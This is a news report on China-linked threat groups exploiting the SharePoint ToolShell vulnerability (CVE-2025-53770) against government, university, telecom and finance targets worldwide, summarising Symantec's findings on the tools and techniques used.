Global Sharepoint ToolShell Cyberattacks: Targeting Organizations Worldwide

Chinese Hackers Exploit ToolShell Vulnerability in Microsoft SharePoint

Recent cyber attacks targeting government agencies, universities, telecommunication service providers, and finance organizations have been linked to hackers believed to have ties to China. These hackers have exploited the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint, affecting on-premise servers and leading to widespread attacks.

The security flaw was disclosed as an actively exploited zero-day on July 20, prompting Microsoft to release emergency updates the following day. The vulnerability serves as a bypass for CVE-2025-49706 and CVE-2025-49704, allowing remote code execution and full access to the file system without authentication.

According to reports, three Chinese threat groups – Budworm/Linen Typhoon, Sheathminer/Violet Typhoon, and Storm-2603/Warlock ransomware – have been identified as exploiting ToolShell. Symantec, a cybersecurity company, revealed that the attacks extended beyond China, targeting organizations in the Middle East, South America, the U.S., and Africa.

Targets of the Attacks

• A telecommunications service provider in the Middle East
• Two government departments in an African country
• Two government agencies in South America
• A university in the United States
• A state technology agency in Africa
• A Middle Eastern government department
• A European finance company

The attacks typically involved the deployment of webshells for persistent access, DLL side-loading of backdoors like Zingdoor, and the use of malware such as the ShadowPad Trojan and the Sliver post-exploitation framework. Legitimate executables from Trend Micro and BitDefender were used for side-loading, with tactics like credential dumping and domain compromise via PetitPotam employed by the threat actors.

Various tools, including Certutil from Microsoft, the GoGo Scanner, and the Revsocks utility, were utilized for data exfiltration, command-and-control, and persistence on compromised devices. Symantec’s findings suggest that the ToolShell vulnerability was exploited by a larger set of Chinese threat actors than previously known.

Picus Blue Report 2025 Highlights Password Security Concerns